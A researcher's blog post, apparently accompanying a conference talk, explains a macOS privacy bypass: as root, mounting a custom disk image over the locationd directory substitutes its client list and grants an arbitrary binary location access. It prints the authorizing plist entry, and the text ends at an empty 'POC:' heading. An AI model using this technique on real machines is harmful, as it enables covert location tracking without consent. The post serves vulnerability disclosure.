This is a quick blogpost about a vulnerability I covered in our Black Hat Europe 2022 talk with Wojciech Regula.
In contrary to what people would expect, clients which can access location services are not maintained in one of the TCC databased, but in a separate location, and it’s maintained by locationd. This has been also recently covered by Howard Oakley, in his Privacy: what TCC does and doesn’t blogpost.
TCC’s location services allowed client list is located inside /var/db/locationd/clients.plist. This file is protected by the Sandbox/TCC, thus we can’t modify it, and add new client, even if we have root privileges.
However the /var/db/locationd/ directory is not protected from mounting. We can create a custom disk image, with a custom client list, and mount it over the directory. After restarting locationd the new list will take effect. This allows us to bypass locationd TCC protection.
To demonstrate access I used Justin Bui’s SwiftLiverpool tool.
The POC, will drop the compiled binary swiftliverpooland grant it access in a custom PLIST file. Then it will create a disk image and mount it over the specified directory. It must be run as root, because only then we can mount over the directory.
In the custom PLIST file the important entry is the following, this is what grants the executable access to location services.
<key>com.apple.locationd.executable-</key>
<dict/>
<key>com.apple.locationd.executable-/private/tmp/swiftliverpool</key>
<dict>
<key>Authorized</key>
<true/>
<key>BundleId</key>
<string>com.apple.locationd.executable-/private/tmp/swiftliverpool</string>
<key>Executable</key>
<string>/private/tmp/swiftliverpool</string>
<key>Registered</key>
<string>/private/tmp/swiftliverpool</string>
<key>Requirement</key>
<string>cdhash H"39fed059b420f6077761625e2f87b583eae49e88"</string>
</dict>
POC: